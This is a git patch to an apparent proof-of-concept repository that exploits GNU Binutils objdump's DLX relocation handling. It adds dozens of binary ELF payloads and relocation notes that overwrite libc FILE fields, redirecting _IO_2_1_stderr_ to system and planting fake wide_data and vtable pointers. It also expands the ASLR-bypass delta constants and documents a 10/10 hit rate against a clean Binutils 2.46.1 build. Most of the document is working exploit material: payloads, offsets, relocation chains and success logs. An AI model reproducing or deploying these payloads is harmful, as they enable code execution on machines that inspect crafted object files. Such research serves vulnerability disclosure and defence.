From e2e34f39b594c99e99a16447b0bda4df782c599e Mon Sep 17 00:00:00 2001 
From: ashton <63224111+bikini@users.noreply.github.com> Date: Thu, 25 Jun 2026 06:20:19 -0500 Subject: [PATCH] Expand objdump DLX ASLR delta coverage --- objdump-dlx-calc-poc/README.md | 22 ++++++++---- .../docs/aslr-bypass-analysis.md | 32 +++++++++++++++-- .../generate_objdump_dlx_calc_poc.py | 9 ++++- ...c_aslr_gnu2461_f05_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f05_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ 
...c_aslr_gnu2461_f06_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_gnu2461_f06_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bef210000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bef210000_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f05_bf020ff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s6f43e6ff.bin | Bin 0 -> 1280 bytes 
...lc_aslr_orig_f06_bef210000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bef210000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bef210000_s7043e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s6f42e600.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...lc_aslr_orig_f06_bf020ff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f05_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s6f42e600.notes | 34 
++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b6f300000_s7043e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s6f42e600.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s6f42e600.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes | 34 ++++++++++++++++++ ...c_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin | Bin 0 -> 1280 bytes ...aslr_wsl2404_f06_b702fff00_s7043e5ff.notes | 34 ++++++++++++++++++ .../tools/aslr_delta_coverage.py | 31 ++++++++++++++++ 100 files changed, 1717 insertions(+), 9 deletions(-) create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.bin create 
mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.bin create 
mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bef210000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f05_bf020ff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.bin create mode 100644 
objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bef210000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_orig_f06_bf020ff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.bin create mode 100644 
objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f05_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b6f300000_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.bin create mode 100644 
objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f42e600.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e5ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s6f43e6ff.notes create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.bin create mode 100644 objdump-dlx-calc-poc/payloads/dlx_calc_aslr_wsl2404_f06_b702fff00_s7043e5ff.notes create mode 100644 objdump-dlx-calc-poc/tools/aslr_delta_coverage.py diff --git a/objdump-dlx-calc-poc/README.md b/objdump-dlx-calc-poc/README.md index 4ba00cf..ed072d0 100644 --- a/objdump-dlx-calc-poc/README.md +++ b/objdump-dlx-calc-poc/README.md @@ -28,6 +28,7 @@ elf32-dlx - `dlx_chain_builder.py` - small builder used by the generator - `docs/aslr-bypass-analysis.md` - notes on why this is profile-dependent - `tools/search_pointer_transform.py` - Z3 sanity check for fixed pointer transforms +- `tools/aslr_delta_coverage.py` - lists the libc low-32 delta coverage used by the generator The payload files are named `.bin` because they are raw binary files, but the file format inside is ELF/DLX. 
@@ -43,22 +44,31 @@ relative offsets observed in the target process: ```text layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` -That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. +That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. The six `system_delta` values cover every page-aligned low-32-bit libc base for the documented `_IO_2_1_stderr_` and `system` offsets. A miss can still happen if the heap/libio profile or libc build does not match, so the runner keeps the retry loop. More detail is in `docs/aslr-bypass-analysis.md`. -The `gnu2461` profile was validated with the existing runner: +The expanded `gnu2461` profile was validated with the existing runner against a +clean GNU Binutils 2.46.1 `dlx-elf` objdump build: ```text -HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin -CALC_HELPER_RAN 2026-06-25T11:14:27Z +HIT try=1 payload=payloads/dlx_calc_aslr_gnu2461_f06_b702fff00_s7042e500.bin +CALC_HELPER_RAN 2026-06-25T11:19:07Z +``` + +A ten-run one-sweep stability pass against the same clean build also hit every +run: + +```text +hits=10/10 +CALC_HELPER_RAN 2026-06-25T11:19:31Z ``` So a plain crash like this does not always mean the PoC failed: diff --git a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md index 15df6a9..2583658 100644 --- a/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md 
+++ b/objdump-dlx-calc-poc/docs/aslr-bypass-analysis.md @@ -24,7 +24,7 @@ off_io=-0x3690 off_sec=0xbb0 rbase=0x220 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` The `gnu2461` profile uses: @@ -35,7 +35,7 @@ off_sec=0xbb8 sec_size_offset=0x40 rbase=0x190 buf_delta=0x702fff00 or 0x6f300000 -system_delta=0x7042e500 or 0x7043e4ff +system_delta=0x7042e500, 0x6f42e600, 0x7043e4ff, 0x6f43e5ff, 0x7043e5ff, or 0x6f43e6ff ``` The 2.46.1 profile differs because the relocation cache array moved from @@ -43,6 +43,34 @@ The 2.46.1 profile differs because the relocation cache array moved from to `data+0xbb8`, and the `bfd_section.size` field used to widen generic relocation range checks is at section offset `0x40`. +## Fixed delta coverage + +The `FILE+0x68` field starts as a libc pointer to `_IO_2_1_stderr_`. The +payload uses a 32-bit big-endian relocation add to turn that low 32-bit value +into the low 32 bits of `system`. + +The previous payload set included two deltas. For the documented offsets: + +```text +_IO_2_1_stderr_ offset = 0x2044e0 +system offset = 0x58750 +``` + +there are six possible deltas over all page-aligned low-32-bit libc bases: + +```text +0x7042e500 pages=703488 coverage=0.670898 cumulative=0.670898 +0x6f42e600 pages=235520 coverage=0.224609 cumulative=0.895508 +0x7043e4ff pages=82620 coverage=0.078793 cumulative=0.974300 +0x6f43e5ff pages=26520 coverage=0.025291 cumulative=0.999592 +0x7043e5ff pages=324 coverage=0.000309 cumulative=0.999901 +0x6f43e6ff pages=104 coverage=0.000099 cumulative=1.000000 +``` + +`tools/aslr_delta_coverage.py` reproduces that table. This is better coverage +for the libc low-32 portion of the bypass, not a claim that the heap/libio +profile is universal. + ## Why argv two-stage is not enough A deterministic leak-then-exploit route would need this sequence in one 
diff --git a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py index faf2348..ed2252b 100644 --- a/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py +++ b/objdump-dlx-calc-poc/generate_objdump_dlx_calc_poc.py @@ -28,7 +28,14 @@ SECTION_SIZE_HIGH = OFF_SEC + 0x3C BUF_TO_FILE_BE32_DELTAS = (0xEF210000, 0xF020FF00) WIDE_TO_FAKE_BE32_DELTAS = (0x4FFF0000,) -STDERR_TO_SYSTEM_BE32_DELTAS = (0x7042E500, 0x7043E4FF) +STDERR_TO_SYSTEM_BE32_DELTAS = ( + 0x7042E500, + 0x6F42E600, + 0x7043E4FF, + 0x6F43E5FF, + 0x7043E5FF, + 0x6F43E6FF, +) FILE_JUMPS_TO_WFILE_OVERFLOW_FINISH_BE16 = 0x0002 LAYOUTS = ( 
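Review bot: The expanded `STDERR_TO_SYSTEM_BE32_DELTAS` tuple carries no comment tying it to the `_IO_2_1_stderr_`/`system` offsets it was derived from, so this constant, the table in `docs/aslr-bypass-analysis.md` and the new `tools/aslr_delta_coverage.py` can drift apart silently whenever one of them is updated. A header comment above the tuple would pin that down, e.g. `# Six low-32 deltas from _IO_2_1_stderr_ (0x2044e0) to system (0x58750) over all page-aligned libc bases; listed in coverage-descending order, see docs/aslr-bypass-analysis.md; regenerate with tools/aslr_delta_coverage.py.` The same comment should state that the set is specific to a libc build with exactly those two symbol offsets, which is the reason the README keeps the retry-loop caveat. The order of the tuple matches the coverage-descending order of the doc table and presumably drives the order in which payloads are produced further down the file; if so, say so in the comment, since reordering would not be a cosmetic change.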
diff --git a/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin b/objdump-dlx-calc-poc/payloads/dlx_calc_aslr_gnu2461_f05_b6f300000_s6f42e600.bin new file mode 100644 index 0000000000000000000000000000000000000000..25023215a008bd50ba066e8b92e6c9603f597d1e GIT binary patch literal 1280 zcmd5*%Ss$U6g@rN+K$GkGiuZXvWTD{v{OAkQAtQJ5ez7}5Og7mVp>);S1kMF;5BhV_2IA zzoT%`TKE1}iS+>3Szf&gIN2chRt8$gGjl+z;5^`p{sm|w@AwI11%CnUf;BF|-@p^1 z{T%2Nd;vU_zqZg&+usPA=jO^E7vHKYWv_w;TRW!_Rx8mh$Hff4|`$ zH0tbE)A=ur`YWS8QZ7(w+<(mQj~o7C`R$Lif7U4T~5K6DX!0(ug93VIrP26~nyDYLF$UZr$Wfwx=Q`TA*V|7foa@3?f(#P#W6WqSvnt{g}BInLrc{tL*A$x7b2 zynLCdB$C{vke FILE fake wide vtable +013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2 +014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3 +015 target=-0x3628 sym=0x6f42e600 FILE+0x68 _IO_2_1_stderr_ -> system +016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2 +017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3 +018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data +019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2 +020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3 +021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow +022 target=0x0 sym=0x00000000 pad R_DLX_NONE +023 target=0x0 sym=0x00000000 pad R_DLX_NONE +024 target=0x0 sym=0x00000000 pad R_DLX_NONE 
